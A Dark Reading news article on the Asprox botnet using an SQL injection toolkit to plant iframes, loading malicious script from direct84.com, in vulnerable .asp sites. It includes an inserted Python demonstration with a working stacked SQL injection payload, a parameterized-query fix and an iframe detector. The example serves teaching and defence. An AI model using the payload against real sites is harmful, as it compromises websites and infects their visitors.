Bots Use SQL Injection Tool in New Web Attack

Phishing botnet Asprox uses zombies to infect Websites, recruit more bots


A little-known botnet has put a different spin on the recent wave of SQL injection attacks on thousands of Websites: It’s outfitting its bots with its own tool to launch SQL injection attacks on vulnerable sites. (See Third Wave of Web Attacks Not the Last.)

The Asprox botnet, a relatively small botnet known mainly for sending phishing emails, has been spotted in the last few days installing an SQL injection attack tool on its bots. The bots then use Google to find .asp pages containing specific search terms and hit the sites returned with SQL injection attacks, says Joe Stewart, director of malware research for SecureWorks, who has documented his findings on the attack.

Stewart says the Asprox botnet’s SQL injection attack is likely a copycat of the recent SQL injection Website attacks from China, which deliver a Trojan that steals online gaming passwords. But this is the first SQL injection attack Stewart has seen using a botnet and a toolkit to do the dirty work. Asprox so far has infected over 1,000 Websites this way, he says.

“I’ve seen bots get other types of infection tools, but not SQL injection” tools, Stewart says. “It’s almost like they noticed the Chinese[-based] attack and copied their code into their own binary for their own attack... The hacks are so similar to the way the other SQL injection attacks are going.”

The attack injects an iframe into the compromised Website's pages; the iframe loads a malicious JavaScript file from the "direct84.com" domain, which then infects visitors.
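The mechanism behind the two paragraphs above, as an added example that is not code from the article or from SecureWorks: a constructed in-memory SQLite database stands in for an ASP site's backend, a stacked SQL injection in a request parameter appends a hidden iframe to every stored description at once, a parameterized query refuses the same payload, and a small scan finds iframes pointing at a known-bad host. The "direct84.com" host comes from the article; the iframe's path, zero-size framing, table layout and product rows are assumptions made for illustration.

```python
"""Added example (not from the article or SecureWorks): a constructed,
in-memory stand-in for an ASP site's database, showing how a stacked
SQL injection plants a hidden iframe in stored content, how a
parameterized query stops it, and a check that finds such iframes."""
import re
import sqlite3

# The article names only the host; the path and the zero-size framing
# are assumptions for illustration.
INJECTED_IFRAME = ('<iframe src="http://direct84.com/" width="0" height="0">'
                   '</iframe>')

# Constructed payload for a request parameter such as ?id=...: "1" keeps the
# original SELECT valid, the semicolon starts a second statement, and the
# UPDATE appends the iframe to every product description at once.
PAYLOAD = ("1; UPDATE products SET description = description || '"
           + INJECTED_IFRAME + "'")

# Matches an iframe and captures the host its src points at.
IFRAME_RE = re.compile(
    r'<iframe[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)',
    re.IGNORECASE)


def make_db():
    """Fresh database with two constructed product rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'widget', 'A fine widget.');
        INSERT INTO products VALUES (2, 'gadget', 'A useful gadget.');
    """)
    return conn


def vulnerable_lookup(conn, product_id):
    """The classic ASP pattern: the request parameter is glued into the SQL
    text and the backend runs every statement in the string (executescript
    stands in for a driver that permits stacked queries)."""
    sql = "SELECT name, description FROM products WHERE id = " + str(product_id)
    conn.executescript(sql)  # runs the SELECT *and* the attacker's UPDATE


def safe_lookup(conn, product_id):
    """Parameterized form: the value is bound, never parsed as SQL, so the
    payload is just a string that matches no integer id."""
    cur = conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,))
    return cur.fetchall()


def find_injected_iframes(conn, bad_hosts):
    """Scan stored descriptions for iframes pointing at known-bad hosts.
    Returns (product id, host) pairs; the same regex works on crawled HTML."""
    bad = {h.lower() for h in bad_hosts}
    hits = []
    for pid, desc in conn.execute("SELECT id, description FROM products"):
        for m in IFRAME_RE.finditer(desc or ""):
            host = m.group(1).lower()
            if host in bad:
                hits.append((pid, host))
    return hits


if __name__ == "__main__":
    db = make_db()
    vulnerable_lookup(db, PAYLOAD)
    print("after vulnerable lookup:", find_injected_iframes(db, {"direct84.com"}))
    db = make_db()
    print("safe lookup with payload returns:", safe_lookup(db, PAYLOAD))
    print("after safe lookup:", find_injected_iframes(db, {"direct84.com"}))
```

The payload works only because the vulnerable path lets one request parameter carry a second statement; binding the value closes that door regardless of what the string contains. The scan is the check a site owner wants after an incident like this one: run it over the database's text columns (or over crawled pages) with the hosts the attack is known to use, and every row it returns is a page that is serving the iframe to visitors.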

Several researchers, including IBM ISS’s X-Force team and Fortify Software, have witnessed copycat SQL injection Website attacks in recent days. “These [SQL injection Website attacks] are not orchestrated together. They are very opportunistic,” says Jacob West, manager of the security research group at Fortify.

Asprox, meanwhile, is also recruiting new bots in its attack: when a user visits a site infected by Asprox via SQL injection, he or she ends up infected with Asprox botware. Unbeknownst to the user, his or her machine could, in turn, receive a download of the SQL injection toolkit to continue the cycle. "This has potential to spread like a worm," Stewart says.

“Its purpose is to infect Websites, and then recruit more bots,” he says. SecureWorks had Asprox at about 15,000 bots last month, but is recounting the botnet to see how much this new attack vector is expanding the botnet. (See SecureWorks Unveils Research on Spamming Botnets.)

Asprox has also thrown in some “scareware” for good measure. “It sends out its spam, but also... posts a warning that there’s spyware found on your computer, [so you should] download this to get rid of it,” Stewart says. “You have to pay for it, so they get your credit card information, too. It’s some additional income on the side,” although the scareware appears to be handled more by an affiliate than by Asprox itself, he says.

Why this particular botnet-borne SQL injection attack? “It’s a new attack vector. It gives them a way to expand their gene pool” and to get a lot bigger, Stewart says. “If you’re a spamming botnet and you spread mainly by emailing links to get users to click on them, you’re always limited to the pool of email addresses you’re already spamming.

“This gives you a fresh set of bots,” he says.

Stewart says Asprox operators are trying to expand the botnet to compete more strongly with others for a piece of the action. “This botnet is emerging and trying to compete,” he says.


About the Author

Kelly Jackson Higgins, Editor-in-Chief, Dark Reading

Kelly Jackson Higgins is the Editor-in-Chief of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise Magazine, Virginia Business magazine, and other major media properties. Jackson Higgins was recently selected as one of the Top 10 Cybersecurity Journalists in the US, and named as one of Folio's 2019 Top Women in Media. She began her career as a sports writer in the Washington, DC metropolitan area, and earned her BA at William & Mary. Follow her on Twitter @kjhiggins.
